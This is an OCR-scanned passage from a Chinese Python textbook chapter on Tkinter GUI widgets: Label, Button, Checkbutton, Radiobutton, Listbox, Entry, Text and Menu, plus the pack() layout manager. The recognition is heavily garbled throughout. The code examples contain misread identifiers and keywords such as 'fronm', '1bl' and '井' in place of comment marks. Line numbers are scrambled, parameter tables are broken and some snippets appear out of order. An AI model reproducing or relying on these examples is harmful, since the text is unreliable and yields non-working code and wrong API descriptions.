Pe 我 很 着 ， 但 我 易学 | 


图 8-1 Tkinter 窗口 创建 示例 


8.2.2 标签 Label 
Label 标签 是 用 于 显示 文本 和 位 图 的 。Label 组 件 的 常用 参数 如 表 8-1 所 示 。 


口 ,使 用 root. geometry( 放 置 位 置 ) 方 法 ,“ 放 置 位 置 ”表达 式 为 








口 放 到 桌面 中 间 , 首 先 必须 获得 屏幕 的 分 辨 率 。 通 过 winfo_screenwidth() 


口 的 宽度 和 高 度 。 使 用 winfo_reqwidth() 方 法 和 winfo_reqheight() 方 法 获 





屏幕 高 度 减 


窗口 宽 x 窗 


128) Python 编程 入 门 与 案例 详解 


表 8-1 Label 组 件 的 常用 参数 



































参 。 数 描述 
height 组 件 的 高 度 ( 所 占 行 数 ) 
width 组 件 的 宽度 (所 占 字符 个 数 ) 
fg 字体 前 景 颜色 
bg 背景 颜色 
jy 多 行文 本 的 对 齐 方式 : center( 默 认 ) left.right 
padx 文本 左右 两 侧 的 空格 数 (默认 为 1) 
pady 文本 上 下 两 侧 的 空格 数 ( 默 认为 1) 
font 标签 的 字体 ,大 小 ,格式 为 (font_namessize) 
image 被 显示 的 图 像 
控制 要 显示 的 文本 和 图 像 。None 默认 值 ,表示 只 显示 图 像 , 不 显示 文本 ; bottom/top/ 
fompound 。 ||/right, 表 示 图 片 显示 在 文本 的 下 /上 / 左 / 右 ; center, 表 示 文 本 显示 在 图 片 中 心 上 方 





1. 显示 文本 的 方法 


标签 对 象 = Label( 窗 口 对 象 ,text = 标签 显示 的 文本 ) # 创建 文本 标签 
标签 对 象 . pack() 井 显示 标签 


例 [ch8_2_2_label01. py】 


1. #coding:utf—8 

2. from tkinter import * 

3. root =Tk() # 创建 窗口 

4. root. title( 'Label 示例 ') # 设 置 窗口 标题 

5. 1_txt = Label(root, text = "标签 示例 ",fg = 'red', bg = 'blue', font = "隶书 26 bold") 
6. 井 设置 标签 的 文本 .前 景色 .背景 色 .字体 

7. 1 txt.pack() # 显示 窗口 

8. root.mainloop() # 窗 口 主 循环 


Label 标签 显示 文件 示例 如 图 8-2 所 示 。 





图 8-2 Label 标签 显示 文件 示例 
2. 显示 位 图 标签 


标签 对 象 = Label( 窗 口 对 象 ,bitmap = 位 图 值 ) 

# 创 建文 本 标签 , 可 用 的 位 图 有 : error、 hourglass 、 info、questhead、question 、warning、gray12、 
gray25 .gray50 ,gray75 

标签 对 象 . pack() 井 显示 标签 


3. 显示 自 定 义 图 片 
通过 image 属性 指定 要 显示 的 自 定义 图 片 , 这 里 的 图 片 必 须 是 经 过 Tkinter 转换 后 的 
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图 像 格式 。 转 换 方式 为 


bitmap image = Tkinter. BitmapImage(file = "位 图 片 路 径 ") 
normal image = Tkinter.PhotoImage(file = "gif、ppm/pgm 图 片 路 径 ") 


例 [ch8_2_2_label02. py】 


from tkinter import * 

root = Tk() # 创 建 主 窗 体 

root.title( ' 图 片 标签 示例 ') 

bp_label = Label (root, bitmap = 'question') # 显示 问号 位 图 
bp_label. pack( ) 

labell = Label (root, text = 'error', bitmap = 'error', compound = 'left') 
## 显示 error 文本 ,位 图 ,位 图 在 左 侧 

labell. pack() 

. nm image = PhotoImage(file = "003.gif") 

9. imagelabel = Label(root, text = "Label 示例 ", image = nm_image, compound = 'left') 
10. imagelabel. pack() 

11. root.mainloop() 


Label 标签 显示 位 图 示例 如 图 8-3 所 示 。 


au 必 w Nb 


oa 





图 8-3 ”Label 标签 显示 位 图 示例 


4. 显示 其 他 格式 的 图 片 

用 PhotoImage(file 一 "gif ppm/pgm 图 片 路 径 ") 只 能 打开 GIF .PPM、PGM 格式 图 
片 , 若 要 打开 显示 其 他 格式 的 图 片 ,需要 使 用 PIL 模块 ,下 载 .安装 方法 参见 第 12 章 。 

例 [ch8_2_2_label03. py】 


#coding:utf—8 

from tkinter import * 

from PIL import Image, ImageTk 
image01 = Image. open("python. jpg") 
root = Tk() 

photo = ImageTk. PhotoImage( image01) 
lbl = Label(root, image= photo) 
1bl. pack() 

root. mainloop( ) 


oaouwwm 


8.2.3 按钮 Button 
Button 小 部 件 是 一 个 标准 的 Tkinter 部 件 , 用 于 实现 各 种 按钮 。 按 钮 可 以 包含 文本 或 


图 像 ,通过 Button 按钮 可 以 调用 Python 函数 或 方法 ,按钮 被 按 下 时 ,会 自动 调用 该 函数 或 
方法 。 
Button 对 象 的 基本 方法 是 : 


Button( 父 窗口 ,text = ' 显 示 文 字 ', command = 回调 函数 或 方法 ) 


1. Button 按钮 显示 文本 
例 [ch8_2_3_Button_01. py】 


#coding:utf -8 
from tkinter import * 
from tkinter. messagebox import * 
def bn_command( ) : 
showinfo(title= ' 信 息 ', message = "您 单 击 了 ' 单 击 我 ' 按 钮 ") 
root = Tk() 
bn = Button(root, text = ' 单 击 我 '，command = bn_command) 
## command 指定 按钮 按 下 时 调用 的 函数 /方法 
. bn.pack() 


10. root.mainloop() 


Button 按钮 显示 文本 效果 如 图 8-4 所 示 。 


Dowaou we wb 





图 8-4 ”Button 按钮 显示 文本 效果 


2. Button 按钮 显示 图 片 

Button 显示 图 片 的 方法 与 Label 相似 ,一 种 方法 是 通过 bitmap 属性 指定 显示 的 位 图 ; 
另 一 种 方法 是 用 PhotoImage() 方 法 、BitmapImage() 方 法 打开 图 片 文件 ,通过 Button 的 
image 属性 指定 图 片 ,通过 compound 指定 图 片 的 位 置 。 

例 [ch8_2_3_Button_02. py】 


#coding:utf -8 
from tkinter import * 
from tkinter. messagebox import * 
def bn help(): 
showinfo(title= ' 信 息 ',message = "您 单 击 了 'Help' 按 钮 ") 
root = Tk() 
bnl = Button(root, text = 'help', bitmap= 'question', compound = 'left',command= bn help) 
bnl1. pack() 


oO AU 人 WD 








10. root.mainloop() 
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9. gifimage= PhotoImage(file= 'arrow.gif') 
10. bn2 = Button(root, text = ' 上 传 ', image = gifimage, compound = 'left') 
11. bn2.pack() 
12. root.mainloop() 
Button 按钮 显示 图 片 效 果 如 图 8-5 所 示 。 
3. 设置 Button 状态 
Button 有 normal、active、disabled 三 种 状态 ,通过 state 属性 设置 。 
例 [chg_2 3_Button_ 03.py】 
1. #coding:utf—8 
2. from tkinter import * 
3. from tkinter.messagebox import 关 
4. root = Tk() 
5. root.title(" 按 钮 的 三 种 状态 ") 
6. bnl = Button(root,text = 'normal'，state = 'normal',width= 30) 
7. bnl.pack() 
8. bn2 = Button(root, text = 'active', state = 'active',width= 30) 
# width 指定 按钮 宽度 ,height 指定 高 度 
9. bn2.pack() 
10，bn3 = Button(root,text = 'disabled', state = 'disabled',width= 30) 
11. bn3.pack() 
12. root.mainloop() 
Button 的 三 种 状态 如 图 8-6 所 示 。 
| 
图 8-5 Button 按钮 显示 图 片 效果 图 8-6 ”Button 的 三 种 状态 
4. 设置 Button 的 焦点 
焦点 是 人 机 交互 时 ,方便 用 户 操 作 。 使 用 focus_force() 方 法 设置 焦点 。 
例 [ch83_2_3_Button_04. py】 
1. #coding:utf—8 
2. from tkinter import * 
3. root = Tk() 
4. ”root.title(" 设 置 按钮 的 焦点 ") 
5. bnl = Button(root, text= 'ok', width= 20) 
6. bnl.focus force() 
7. bnl.pack(side= 'left') # 使 用 pack 布局 管理 器 的 side 选项 指定 排列 在 左边 
8. bn2 = Button(root, text= 'cancel',width= 20) 
9. bn2.pack(side= 'right') # 使 用 pack 布局 管理 器 的 side 选项 指定 排列 在 右边 





图 8-7 设置 Button 的 焦点 效果 


8.2.4 复 选 框 Checkbutton 


复 选 框 Checkbutton 具有 两 个 状态 : on 与 off ,当选 中 时 为 on; 未 选中 时 为 off。 
1. 创建 Checkbutton 
复 选 框 的 创建 方法 为 


Checkbutton( 窗 口 对 象 ,text = ' 显 示 的 文本 ',command = 回调 函数 ) 
例 [chg_2_ 4_chkbn_01.py】 


#coding:utf—8 
from tkinter import * 
from tkinter. messagebox import * 
def chkbncallback( ): 
showinfo(title = ' 信 息 ', message = "你 已 单 击 了 复 选 框 ") 
root = Tk() 
chkbn1l = Checkbutton(root, text = ' 是 否 为 共青团 员 ', command = chkbncallback) 
chkbn1. pack( ) 
root. mainloop( ) 


创建 的 复 选 框 运行 效果 如 图 8-8 所 示 。 


Dowaoum wb 





图 8-8 创建 的 复 选 框 运 行 效果 


2. 获取 Checkbutton 的 状态 

Checkbutton 有 两 种 状态 , 即 on 和 off,on 为 1,off 为 0。 在 创建 Checkbutton 时 用 
onvalue 属性 设置 被 选中 状态 ,使 用 offvalue 属性 设置 取消 选中 的 值 。 

例 [ch8_2_4_chkbn 02.py】 

1. 井 coding:utf-B 


2. fronm tkinter import * 
3. fronm tkinter. messagebox import * 
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4. def bn_callback() : 

5. if v.get() == "1": 

6. showinfo(title = ' 信 息 ', message = "你 喜欢 ") 

六 else: 

8 showinfo(title = ' 信 息 ', message = "你 不 喜欢 ") 
9. root = Tk() 


10. v= StringVar() 

11. chkbnl = Checkbutton(root, variable=v,text= ' 是 否 喜 欢 ', onvalue= '1', offvalue = '0') 
12. v.set('1') 

13. chkbn1. pack() 

14. bn = Button(root, text = ' 获 取 数 据 ', command = bn_callback) 

15. bn.pack() 

16. root.mainloop() 


(可 说 明 第 5 行 ,v. get() 二 二 "1", 说 明 Checkbutton 为 on 状态 ; 相反 ,v. get() 一 一 "0"， 
说 明 Checkbutton 为 off 状态 。 

第 11 行 ,onvalue 设置 了 为 on 状态 时 的 值 ,offvalue 设置 了 为 off 状态 时 的 值 。 

第 12 行 ,设置 Checkbutton 的 初始 状态 值 为 1. 即 on 状态 。 

获取 Checkbutton 的 状态 值 效 果 如 图 8-9 所 示 。 








图 8-9 获取 Checkbutton 的 状态 值 效果 


8.2.5 单 选 按钮 Radiobutton 


单 选 按钮 Radiobutton 显示 若干 个 单 选项 ,可 以 从 中 选择 一 项 ,从 而 实现 多 选 一 。 每 个 
选项 可 以 显示 文本 与 图 像 ,每 个 按钮 可 以 与 一 个 函数 或 方法 关联 ,当选 择 某 个 按钮 时 自动 执 
行 该 函数 或 方法 。 

Radiobutton 的 构造 方法 : 

rdbn = Radiobutton( 父 容器 , text = 显示 文字 , variable = 分 组 值 , value = 选项 的 值 , command = 回调 

函数 ) 

若 要 将 多 个 Radiobutton 选项 放 到 一 组 中 ,variable 的 值 必须 一 致 。 

例 [ch8g 2 5_rbn_01.py】 

#coding:utf -8 
from tkinter import * 


from tkinter. messagebox import * 
def rbn callback(): 


心 WwW N PP 


5 value v=v.get() 

6 ey 

驰 showinfo(title = "信息 ',message = "你 选 了 Python") 
8 半 el vs 

9 showinfo(title = ' 信 息 ',message = "你 选 了 Java") 


10. elif value v==3: 
i showinfo(title = ' 信 息 ', message = "你 选 了 C#") 
12. elif value v==4: 

33， showinfo(title= ' 信 息 ', message = "你 选 了 C") 


14. root = Tk() 

15. v= IntVar() 

16. v.set(1) 

17. Label(root, text = ' 请 选择 一 个 您 最 喜欢 的 语言 : '). pack() 

18. rbnl = Radiobutton(root, variable = vtext = 'Python',value = 1,command = rbn callback) 
19. rbnl.pack() 

20. rbn2= Radiobutton(root, variable=v,text = 'Java' value = 2, command = rbn callback) 
21. rbn2.pack() 

22. rbn3= Radiobutton(root, variable=v,text= 'C#',value=3,command= rbn callback) 
23. rbn3.pack() 

24. rbn4 = Radiobutton(root, variable=v,text= 'C',value = 4,command = rbn callback) 
25. rbn4.pack() 

26. root.mainloop() 


( 生 说 明 : 第 15 行 ,定义 了 一 个 ntVar() 型 变量 v。 

第 16 行 ,把 v 设 置 为 1。 

第 18 行 ,variable 王 v 设置 了 分 组 值 ,text 一 'Python' 设 置 了 显示 文本 ,value 王 1 设置 了 
选项 的 值 ,command 王 rbn_callback 设置 了 回调 函数 。 

第 20 行 .第 22 行 .第 24 行 ,定义 了 另 三 个 选项 。 

单 选 按钮 示例 如 图 8-10 所 示 。 











图 8-10 单 选 按 钮 示例 


为 了 把 多 个 单 选 按钮 从 视觉 上 显示 也 在 一 个 分 组 里 面 ,需要 用 到 LabelFrame 组 件 作 
为 父 容器 ,把 Radiobutton 放 到 LabelFrame 里 ,再 添加 一 个 说 明文 字 。 
创建 LabelFrame 的 语法 为 


LabelFrame( 父 容器 ,text = ' 标 签 中 显示 的 文字 ') 
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例 [ch8_2_5_rbn_02. py]】 


#coding:utf—8 


from tkinter import * 


from tkinter. messagebox import * 


def rcomand( ) : 


，1frame. pack() 
23. 


root. mainloop( ) 


vl=v.get() 
if vl == 10: 
showinfo(title = ' 信 息 ', message = ' 你 选 了 苹果 ') 
elif vl == 20: 
showinfo(title = ' 信 息 ', message = ' 你 选 了 香 禁 ') 
elif vl == 30: 
showinfo(title = ' 信 息 ', message = ' 你 选 了 桃子 ') 
elif vl == 40: 
showinfo(title = ' 信 息 ', message = ' 你 选 了 梨子 ') 
. root = Tk() 
.lframe = LabelFrame(root，text = ' 请 选择 一 个 你 喜欢 的 水 果 : ') 
. v= IntVar() 
，Radiobutton(1frame，text = ' 革 果 ', variable = vvalue = 10, command = rcomand). pack() 
.Radiobutton(1frame，text = ' 香 攀 ', variable = v,value = 20, command = rcomand). pack() 
. Radiobutton(lframe, text = ' 桃 子 ', variable = v,value = 30, command = rcomand). pack() 
. Radiobutton(1lframe, text = ' 梨 子 ', variable=v,value = 40, command = rcomand). pack() 
，V.set(10) 


说明: 第 15 行 ,创建 了 一 个 LabelFrame 作为 父 容器 ,下 面 的 4 个 Radiobutton 者 


放 在 其 中 。 
LabelFrame 组 件 父 容器 示例 如 图 8-11 所 示 。 





图 8-11 LabelFrame 组 件 父 容器 示例 


8.2.6 列表 框 Listbox 


列表 框 Listbox 用 于 显示 多 个 列表 项 ,可 以 选择 其 中 一 项 或 多 项 。 
Listbox 对 象 的 创建 方法 : 


对 象 名 = Listbox( 父 容量 [, listvariable = v, selectmode = EXTENDED]) 


参数 说 明 : 
listvariable 用 于 获取 列表 选项 的 值 .通常 把 该 值 设置 为 一 个 StringVar 变量 ,通过 


v. get() 获 取 选 项 的 值 。 

selectmode 为 可 选 值 , 可 选 值 有 BROWSE SINGLE. MULTIPLE、EXTENDED。 若 为 
MULTIPLE, 则 列表 框 是 多 选 列 表 框 ,可 以 选择 多 个 选项 值 。 若 为 EXTENDED, 则 支持 
Ctrl、Shift 功能 , 即 选择 时 , 按 住 Ctrl 键 , 实 现 不 连续 多 选 ; 按 住 Shift 键 ,实现 连续 多 选 。 

列表 用 “对 象 名 . insert(index,item) ”方法 添加 选项 ,index 为 选项 插入 的 位 置 ,item 为 
选项 ,一 般 为 字符 串 。 

例 [chg 2 6 lb 01.py】 


1 井 coding:utf 一 8 

和 from tkinter import * 

3 from tkinter. messagebox import * 
4. root = Tk() 

5. root.title('Listbox 示例 ') 
6 1bl = Listbox( root) 

ki 1bl. insert(1,"Python") 
8. 1b 
9 


已 


.insert(2, "Java") 
1b 


已 


.insert(3,"C#") 

10. 1bl.insert(4,"C") 

11. 1bl. insert(5,"PHP") 

12. 1bl.pack() 

13. root.mainloop() 

列表 框 示例 如 图 8-12 所 示 。 

Listbox 组 件 的 主要 方法 如 表 8-2 所 示 。 

表 8-2 Listbox 组 件 的 主要 方法 

activate ( index ) 选择 指定 索引 值 的 行 


返回 一 个 包含 选 定 的 元 素 或 元 素 的 行 号 ,从 0 开始 计数 的 元 组 。 如 果 没 
有 被 选中 , 则 返回 一 个 空 的 元 组 


delete ( first, last 二 None ) | 删除 在 [first,lastj 范 围 内 的 行 .车 第 二 个 参数 last 省 略 , 则 删除 first 行 
返回 索引 从 first 到 last 行 包 含 的 文本 , 若 参 数 last 省 略 , 则 只 返回 first 


记忆 





图 8-12 列表 框 示例 








curselection() 








get ( first, last= None ) 








行文 本 
jon (index。 elementw ) | 添加 一 行 或 多 行 到 列表 框 ,位 置 在 index 之 前 ,使 用 END 作为 第 一 个 参 
| 数 , 则 加 入 列表 框 尾部 
9 返回 Listbox 中 的 行 数 





有 了 列表 框 , 如 何 获取 列表 框 的 内 容 呢 ? 列表 框 有 curselection() 方 法 , 它 返 回 包含 选 
定 元 素 行 号 的 元 组 ,通过 get( 行 号 ) 方 法 返回 选项 的 值 。 
例 [ch8g 2 6_ lb 02.py】 


1. #coding:utf—8 


2. from tkinter import * 
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3. from tkinter.messagebox import * 

4. def showselitem(event): 

5 showinfo(title= ' 选 项 显示 ', message = ' 您 选择 了 第 $d 项 ,选项 内 容 为 %s' 
6. 外 (lbl. curselection()[0],1bl.get(]bl.curselection()))) 

by : root = Tk() 

8. root.title( 'Listbox 示例 ') 

9 1bl1 = Listbox( root, selectmode = EXTENDED) 

10. 1bl.insert(1,"Python") 

11.. Hb 


已 


.insert(2,"Java") 

12. lbl.insert(3,"C#") 

13. 1bl.insert(4,"C") 

14. 1bl. insert(5,"PHP") 

15. 1bl.delete(4) # 删除 下 标 是 4 的 选项 

16. print(1bl.get(0)) 井 打印 第 0 项 的 值 

17. 1b1.bind('< Double - Button - 1>', showselitem) 井 绑 定 双 击 与 showselitem( ) 方 法 
18. 1bl.pack() 


19. root.mainloop() 


> 庆 


已 


人 说明: 第 6 行 ,Ibl. curselection() 方 法 返回 当前 选 定 的 行 ,该 值 为 元 组 ,Ibl. get() 
方法 返回 索引 值 的 选项 值 。 

第 9 行 ,selectmode 一 EXTENDED 指定 列表 框 为 扩展 模式 ,该 模式 下 支持 Ctrl .Shift 
多 选 。 

列表 框 与 事件 绑 定 示例 如 图 8-13 所 示 。 


0 您 选择 了 第 0 项 ， 迁 项 内 容 为 Python 





图 8-13 ”列表 框 与 事件 绑 定 示例 


8.2.7 单行 编辑 框 Entry 

Entry 用 于 单行 文本 的 输入 ,Entry 的 创建 方法 : 
Entry( 父 容器 ). pack() 

1. 设置 初始 输入 值 


初始 的 text 属性 值 不 能 用 于 显示 输入 的 初始 值 , 若 要 设置 输入 初始 值 , 可 以 定义 一 个 
StringVar 变量 ,并 设置 Entry 的 textvariable 等 于 该 变量 ,然后 设置 该 变量 值 即 可 。 


例 [ch8g_ 2 7_entry 01.py】 


entry1. pack() 


root. mainloop( ) 


1. 井 coding:utf 一 8 

2. from tkinter import * 

3. root = Tk() 

4. v= StringVar() # 定 义 一 个 StringVar 变量 

5. entryl = Entry(root, textvariable=v) # 指 定 Entry 的 textvariable 为 变量 v 
6.v.set(" 请 输入 文本 ") # 设 置 v 的 值 ,该 值 为 输入 初始 值 

全 


人 说明 : 本 例 把 Entry 的 textvariable 属性 设置 为 StringVar 型 变量 v, 然 后 设置 v 
的 值 ,达到 设置 初始 输入 值 的 目的 。 

设置 Entry 的 初始 输入 值 示例 如 图 8-14 所 示 。 

2. 将 Entry 设置 为 密码 输入 框 

密码 输入 框 要 求 输入 密码 时 ,密码 不 回 显 或 者 显示 为 "* ”。 

例 [ch8_2_7_entry_02. py】 


#coding:utf—8 

from tkinter import * 

root = Tk() 

entry_pwd = Entry(root) 

entry_pwd. pack() 

entry_pwd[ 'show'] = "x*" 井 将 Entry 的 show 设置 为 "* ", 即 回 显 为 "* " 


root.mainloop() 


ou wN 


将 Entry 设置 为 密码 输入 框 示例 如 图 8-15 所 示 。 


i 





图 8-14 设置 Entry 的 初始 输入 值 示 例 图 8-15 将 Entry 设置 为 密码 输入 框 示例 


3. 获取 并 验证 输入 内 容 


使 用 Entry 的 get() 方 法 可 以 获取 Entry 输入 的 内 容 。 
例 [ch8g_2 7_entry 03.py】 


#coding:utf 一 8 

from tkinter import * 

def validfun(): 
contents = entryl.get() # 获 取 Entry 的 输入 
print(contents) 


print(contents. isalnum()) # 判 断 输入 是 否 是 数字 


root = Tk() 
1bl = Label(root，text = "请 输入 一 个 数字 : ") 
10. 1bl.pack() 


oowaouw he wb 
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11. entryl = Entry(root) 

12. entryl.pack() 

13. btnl = Button(root, text = " 校 验 数据 ", command = validfun) # 单 击 Button 调用 验证 函 
并 数 validfun 

14. btnl.pack() 


15. root.mainloop() 


获取 Entry 数据 示例 如 图 8-16 所 示 。 
8.2.8 多 行 编辑 框 Text 


Text 组 件 用 于 编辑 多 行文 本 。 下 面 列 出 Text 组 件 的 ”图 8-16 获取 Entry 数据 示例 
文本 ,标记 ,标签 方法 。 
对 文本 进行 操作 是 Text 组 件 的 基本 功能 。 表 8-3 列 出 了 Text 的 文本 方法 。 


表 8-3 Text 的 文本 方法 























文本 方法 描 述 
delete(startindex [ ,endindex]) 删除 指定 的 字符 或 范围 的 字符 
get(startindex [,endindex]) 返回 指定 的 字符 或 范围 的 字符 
index(index) 返回 给 定 索引 的 绝对 值 
insert(index [ ,string]...) 在 指定 位 置 插入 字符 串 
see(index) 如 果 文 本 位 于 的 索引 位 置 是 可 见 的 将 返回 真 


标记 是 使 用 书签 在 一 个 给 定 的 文本 两 个 字符 之 间 的 位 置 。 表 8-4 所 示 为 Text 的 标记 
方法 。 


表 8-4 Text 的 标记 方法 

















标记 方法 描 述 
indexCmark) 返回 标记 所 在 的 行 和 列 

， 5 返回 给 定 标记 的 重要 性 ; 若 提供 了 第 二 个 参数 , 则 设置 给 定 标记 的 
mark_gravity(mark [ ,gravity]) WR 

重要 性 

mark_names() 返回 Text 的 所 有 标记 
mark_set(mark, index) 把 给 定 的 标记 指定 到 一 个 新 位 置 
mark_unset(mark) 从 Text 中 去 除 指定 的 标记 





标签 是 用 来 关联 名 称 的 文本 ,这 使 修改 特定 的 文本 区 显示 变 得 容易 。 标 签 也 可 以 用 来 
绑 定 事件 回调 到 特定 范围 的 文字 。 
表 8-5 所 示 为 Text 的 标签 方法 。 
表 8-5 Text 的 标签 方法 
标签 方法 描 述 
tag_add(tagname, startindex[ .endindex] ...) 标记 startindex 开始 的 标签 
tag_config 配置 标签 的 属性 
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续 表 
标签 方法 描 述 
tag_delete(tagname) 删除 标签 
tag_remove(tagname [ ,startindex[. endindex]] ...) 从 提供 的 区 域 去 除 标 签 , 但 不 删除 标签 定义 


例 [ch8_2_8_text_01.py】 


井 coding:utf 一 8 

from tkinter import * 
a | root = Tk() 

4. textl = Text(root) 

5. textl.insert(1.0,"abcdefghijk\n") 
6 text1. insert(2.0,"1234567890") 

7. textl.tag add('fg_blue', '1.4','1.8')  # 从 第 1 行 第 4 个 字符 到 第 8 个 字符 设置 标签 
8. textl.tag config('fg blue', 

9. foreground = 'blue'， 

10. background = "yellow", 


ls underline = 1, 
12. font = 'Times 16°') 


13，text1, tag_add( 'bg_black', '2.2','2.8') 。 并 设置 前 景 为 蓝 包 ,背景 为 黄色 ,下 面 线 字体 
14. textl.tag config('bg_black’, 


15; foreground = 'yellow', 
16. background = "black", 
Ry font = ' 隶 书 32 overstrike') 


18. text1. pack() 


19. root.mainloop() 


多 行文 本 编辑 器 Text 示例 如 图 8-17 所 示 。 
ie 


labcd jk 


ED 





图 8-17 多 行文 本 编辑 器 Text 示例 


8.2.9 菜单 Menu 


Tkinter 工具 箱 中 Menu 组 件 提供 了 创建 菜单 的 功能 ,可 以 创建 三 种 类 型 的 菜单 : 弹出 
式 菜 单 、 顶 层 菜单 和 下 拉 菜单 。 
(1) 创建 菜单 的 方法 : 


menu = Menu ( master，option，... ) 


master 代表 父 容器 ; option 代表 菜单 的 一 些 选 项 ,常用 的 选项 有 activebackground、 


activeborderwidth activeforeground, bg、 bd、 cursor, disabledforeground. font, fg、 postcommand 、 


relief image 等 。 


(2) 添加 菜单 项 : 
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menul.add_command( label = 菜单 文本 ，command = callback) 


(3) 将 菜单 添加 到 窗口 : 


窗口 对 象 [menu] = menu 


菜单 对 象 的 常用 方法 如 表 8-6 所 示 。 


方法 


表 8-6 菜单 对 象 的 常用 方法 
描 述 





add_command (options) 


添加 一 个 菜单 项 到 菜单 





add_radiobutton( options ) 


创建 一 个 单 选 按钮 菜单 项 





add_checkbutton( options ) 


创建 一 个 复 选 框 菜单 项 





add_cascade(options) 


创建 一 个 下 拉 菜 单 





add_separator() 


创建 一 条 分 隔 线 





add( type，options ) 


添加 一 个 指定 类 型 的 菜单 项 到 菜单 





delete( startindex [, endindex ]) 


从 startindex 到 endindex 范围 内 删除 菜单 项 





index(item) 


返回 给 定 的 菜单 项 的 索引 值 





insert_separator ( index ) 


在 指定 的 索引 值 处 插入 分 隔 线 





invoke (index ) 


调用 索引 指定 的 回调 函数 





type (index ) 


1. 创建 下 拉 菜 单 





返回 索引 处 的 菜单 的 类 型 : "cascade” "checkbutton” "command" 


"radiobutton” "separator”"tearoff” 


创建 下 拉 菜 单项 的 语法 类 似 如 下 语句 : 
菜单 栏 对 象 .add_cascade( label = ' 菜 单 文本 '，menu = 菜单 对 象 2) 


例 [chg_2 9_menu 01.py】 


#coding:utf -8 
from tkinter import * 
def doit(): 


print(" 你 选择 了 菜单 项 ") 


menubar = Menu(root) 


并 创建 菜单 栏 


filemenu = Menu(menubar, tearoff =0) 
filemenu.add_ command(label = ' 打 开 ', command = doit) 


2 
3 
4 
5. root = Tk() 
6 
7 
8 
9 


. filemenu.add_command(label = ' 保 存 '，command = doit) 
10. filemenu. add_command(label = ' 另 存 为 "'，command = doit) 


11. filemenu.add separator() 


12. filemenu.add command(label = ' 退 出 '，command = root. destroy) 


13. menubar. add_cascade(label = ' 文 件 ', menu = filemenu) 


井 为 菜单 添加 "文件 "下 拉 菜 单 


14. helpmenu = Menu(menubar, tearoff =0) 


15.，helpmenu. add_command(1abel = ' 帮 助 ', command = doit) 

16. helpmenu. add_command(1label = ' 关 于 ', command = doit) 

17. menubar. add_cascade(label = ' 帮 助 ', menu = helpmenu) # 为 菜单 添加 "帮助 "下 拉 菜 单 
18. root[ 'menu'] = menubar 

19. root.mainloop() 


(村 说 明 : 第 3 一 4 行 ,定义 了 菜单 的 回调 函数 。 

第 6 行 , 定 义 了 菜单 栏 。 

第 7 行 ,定义 了 filemenu 菜单 ,tearoff 一 0 关闭 tearoff 选项 ,菜单 栏 第 0 项 被 tearoff 项 
占据 ,其 他 菜单 项 被 加 到 1 开始 的 菜单 项 。 若 没有 tearoff 二 0 项 , 则 菜单 顶部 会 有 一 条 虚 
线段 。 

第 8 一 10 行 , 用 add_command() 方 法 给 filemenu 菜单 添加 菜单 项 ,label 为 菜单 上 显示 
的 文字 ,command 为 菜单 项 关联 的 回调 函数 。 

第 11 行 , 添 加 一 条 分 隔 线 。 

第 12 行 ,添加 菜单 项 为 “退出 ”, 使 用 root. destroy 关闭 窗口 。 

第 13 行 ,给 menubar 添加 下 拉 菜 单 。label 指定 菜单 文本 为 “文件 ”, menu 二 filemenu 
指定 菜单 为 filemenu。 

创建 的 下 拉 菜 单 示例 如 图 8-18 所 示 。 





图 8-18 创建 的 下 拉 莱 单 示例 


2. 创建 弹出 菜单 
创建 弹出 式 菜单 应 该 实现 以 下 几 步 。 
(1) 创建 菜单 。 


(2) 处 理 菜单 右 击 事件 。 
(3) 在 右 击 事件 中 使 用 “menu. post(event. x_root，event. y_root)”, 弹 出 菜单 。 
例 [ch8_2_ 9_popmenu. py】 


#coding:utf -8 
from tkinter import * 
def mn_command( ) : 
print(" 您 选择 了 弹出 菜单 项 ") 
def popup(event) : 
menu. post (event. x_root, event.y_root) 
root = Tk() 


wo ouw 必 wb 
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8. root.title( ' 弹 出 菜单 示例 ') 

9. textl = Text(root) 

10. for line in range(0,10): 

text1. insert (END, "1234567890\n") 

12. menu = Menu(textl,tearoff=0) 

13. menu_ copy = menu.add command(1label = ' 复 制 ', command = mn_command) 
14. menu cut = menu.add command(label= ' 前 切 ', command = mn_command) 
15. menu paste = menu.add command(label = ' 粘 贴 ,command = mn_command) 
16. textl1.bind('<Button— 3>', popup) 

17. textl. pack() 


18. root.mainloop() 


(可 说 明 : 第 6 行 ,使 用 menu. post(event. x_root，event. y_root), 在 右 击 处 弹出 
菜单 。 

第 12 一 15 行 ,创建 一 个 菜单 。 

第 16 行 ,把 textl 的 右 击 事件 绑 定 了 popup() 函 数 。 

创建 的 弹出 菜单 示例 如 图 8-19 所 示 。 





图 8-19 创建 的 弹出 菜单 示例 


8.3 窗 体 布局 管理 


在 窗 体 中 生成 了 部 件 以 后 ,就 需要 把 它们 放 到 合适 的 位 置 上 ,以 前 只 是 使 用 pack() 布 
局 管理 器 进行 简单 的 布局 管理 ,并 未 实现 较为 复杂 的 布局 管理 ,下 面 将 介绍 Tkinter 的 三 种 
布局 管理 器 pack() .grid() .place() 。 


8.3.1 pack() 布 局 管理 器 


前 面 小 节 已 经 简单 介绍 了 pack() 布 局 管理 器 ,下 面 详细 介绍 其 参数 设置 ,如 表 8-7 所 示 。 
表 8-7 pack() 布 局 管理 器 常用 选项 
anchor | 对 齐 方式 : w 左 对 齐 .n 顶 对 齐 、e 右 对 齐 、s 底 对 齐 
expand | 填充 方式 : yes、no(1、0) 
填充 x 或 y 方 向 上 的 空间 , 值 有 : 'x''y''both''none'; 当 side 为 top/bottom 时 ,填充 x 方向 ; 
当 side 为 left/right 时 ,填充 y 方 向 ; 当 side 为 yes 时 ,填充 父 组 件 的 剩余 空间 











fill 
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ipadx 设置 元 件 内 部 间隙 水 平方 向 的 距离 





ipady 设置 元 件 内 部 间隙 垂直 方向 的 距离 





padx 设置 元 件 外 部 间隙 水 平方 向 的 距离 





pady 设置 元 件 外 部 间隙 垂直 方向 的 距离 





side 合法 的 值 有 : 'left' 'right' 'top' 'bottom', 上 默认 为 'top' 
注 : ipadx、ipady、padx、pady 默认 单位 为 像素 ,可 选单 位 有 : c( 厘 米 ) .i( 英 寸 ) .p( 打 印 机 的 点 , 即 1/27 英寸 ) ,在 值 后 
加 上 一 个 后 级 即 可 。 





例 [ch8g_3_1_pack01.py】 


root 
L1 = 


12. L3 = 


#coding:utf -8 
from tkinter import * 


= Tk() 

Label( root, 
text = 'packl', 
bg = "blue' 


).pack(fill = BOTH,expand = 'yes', side = 'left',padx = 10) 
Label (root, 

text = 'pack2', 

bg = 'green’ 

).pack(fill = X,expand = 'no',side = 'right',pady = 10, ipadx = 10) 
Label(root, 

